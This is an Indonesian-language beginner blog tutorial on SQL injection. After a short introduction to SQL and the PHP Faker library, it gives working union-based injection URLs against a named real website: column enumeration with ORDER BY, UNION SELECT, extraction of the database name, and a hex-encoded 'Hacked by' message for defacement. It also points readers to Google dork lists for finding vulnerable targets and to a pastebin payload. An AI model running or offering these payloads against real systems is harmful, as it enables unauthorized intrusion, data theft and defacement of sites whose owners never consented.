Belajar SQL Injection Basic (pemula)

 Assalamualaikum

Salam Sejahtera dan salam untuk semuanya, selamat pagi/siang/sore/malam

 

11 Juli 2022

Author : Xnuvers007/Indra Dwi A.

 

Kali ini saya akan membahas tentang, apa itu SQL Injection ?

SQL adalah Bahasa Pemrograman yang singkatannya adalah Structured/Standard Query Language, biasanya SQL ini digunakan dalam pengambilan, membaca, menghapus, mengupdate, menambahkan suatu informasi kedalam suatu database

Databases juga sangat penting bagi sebuah server/webserver, karena sifatnya yang menyimpan data, yang dimana berguna dan berfungsi untuk menghindari duplikat data dan memperlihatkan anomali perilaku data.

namun apa yang terjadi jika suatu database mengalami kebocoran data ? tentu saja akan repot jika terjadi aktifitas yang seperti itu, makanya di dalam server database harus juga membuat dummies database dan password yang sulit di hash agar tidak mudah di decrypt.

Dummy/Dummies Database bisa disebut dengan Fake databases, biasanya Dummy Databases ini digunakan untuk pengujian sebuah aplikasi/website sebagai data contoh/palsu. kamu bisa menggunakan Faker ini di library yang khusus PHP dengan versi 5.3.3 atau keatas saja

jika kalian ingin menggunakan Library tersebut, silahkan ke https://github.com/fzaninotto/Faker

atau kalian bisa menginstall nya melalui composer

dengan cara mengetik ini di CMD/Terminal :

composer require fzaninotto/faker

Sediakan file php, saya menamainya index.php, dan isi index.php dengan code seperti ini

<?php

// Jika mendownload faker dengan composer

require_once 'vendor/autoload.php';

?>

ini saya menginstall di composer, jika kalian menginstall manual, silahkan saja pada bagian require_once '....../.../.../../src/autoload.php' intinya isi titik titik tersebut ke file kalian download lewat github sampai ke autoload.php

nah setelah itu saya akan membuat banyak data Dummies di index.php dengan code :

<?php

// Jika mendownload faker dengan composer

require_once 'vendor/autoload.php';

 

// inisialisasi faker

$faker = Faker\Factory::create('id_ID');

 

for($a=0; $a<10; $a++){

// generate data nama, alamat

echo $faker->name;

echo "<br>";

echo $faker->address;

echo "<br> <br>";

}

?>

 

dan hasilnya seperti ini

 

========================================

 

Sekarang lanjut ke SQL Injection , setelah pembahasan tentang databases dan SQL

SQL injection sendiri adalah suatu bug dengan cara menyuntikan Perintah sql ke website

 

celah Bug SQL sendiri memiliki tingkat resiko Severity Critical (Berbahaya), kenapa tingkatnya berbahaya ? ya seperti sebelumnya, jika terjadi kebocoran data di dalam databases, itu sudah sulit.

Nah untuk itu, saya akan memberikan tutorial SQL Injection Bagi Pemula dengan basicnya saja (Belum Dump Database, Colomn dan Table)

Bug : SQL Injection

Risk : >=6.x

Remote : No

Local File : No

Dork : See this (https://github.com/Xnuvers007/ListDork/tree/main/GoogleDork/List/SQLI)

Upload Shell : No

NOTE : karena di artikel ini baru hanya memberikan tutorial basicnya...

Persiapan :

1. Internet

2. OS

3. Brainware (Pengguna)

4. Hardware

5. Target

6. Kopi :V

7. Dios (bisa pake dios gw)

 

execute :

note : Karena disini saya sudah mendapatkan target, jadi target saya aja ya :)

1. target = http://www.minddesign.co.uk/show.php?id=239 

 

2. Setelah itu taro tanda ' pada akhir url, maka nanti akan muncul error seperti ini

  

3. setelah itu kita tulis order by sampai muncul error , dimulai dari order by 1

http://www.minddesign.co.uk/show.php?id=239%27+order+by+1--+-

http://www.minddesign.co.uk/show.php?id=239%27+order+by+2--+- 

http://www.minddesign.co.uk/show.php?id=239%27+order+by+3--+-

http://www.minddesign.co.uk/show.php?id=239%27+order+by+4--+-

dan seterusnya, pada order by 17 akan error, maka kita berhenti di sebelum error yaitu 16

http://www.minddesign.co.uk/show.php?id=239%27+order+by+16--+-

www.minddesign.co.uk/show.php?id=239%27+order+by+17--+-

4. setelah itu tulis union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 , karena 17 error

http://www.minddesign.co.uk/show.php?id=239%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-

 

 

5. kita harus menemukan angka Togelnya maka kita tambahkan - pada parameter

www.minddesign.co.uk/show.php?id=-239'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-

 

artinya kolom kerentanan ada pada nomor 4

 

6. kita akan coba command database() pada union select 4

contoh : http://www.minddesign.co.uk/show.php?id=-239%27+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16--+-

maka nanti akan muncul nama database dari websitenya

 

database tersebut bernama jacobs_mddata

and booom, nama databses terungkap (nanti kita lanjutkan ke tingkat berikutnya dengan target berbeda)

bonus : jika anda ingin menaro nama di webnya anda tinggal ke ascii to text

https://www.rapidtables.com/convert/number/hex-to-ascii.html (gunakan ini)

setelah itu masukan kode html, saya menggunakan ini <h1> Hacked by Xnuvers007 </h1> ubah dari text to ascii maka akan menampilkan angka, salin angkanya lalu gabungkan agar tidak terpisah

before : 3C 68 31 3E 20 48 61 63 6B 65 64 20 62 79 20 58 6E 75 76 65 72 73 30 30 37 20 3C 2F 68 31 3E

after : 3C68313E204861636B656420627920586E7576657273303037203C2F68313E

setelah itu tambahkan concat(0xMasukanAngkaAsciinya) contoh:

http://www.minddesign.co.uk/show.php?id=-239%27+union+select+1,2,3,concat(0x3C68313E204861636B656420627920586E7576657273303037203C2F68313E),5,6,7,8,9,10,11,12,13,14,15,16--+-

 

 

sekian tutorial sql injection dari saya, terimakasih sudah mengunjungi

 

atau jika kalian malas untuk ascii to text, bisa salin dios dari saya

 

https://pastebin.com/raw/H4JDqFhk

YouTube = https://youtu.be/1rfEcgxDwsA

Wassalamualaikum Wr. Wb.

Salam Penutup Bagi Semua

========================================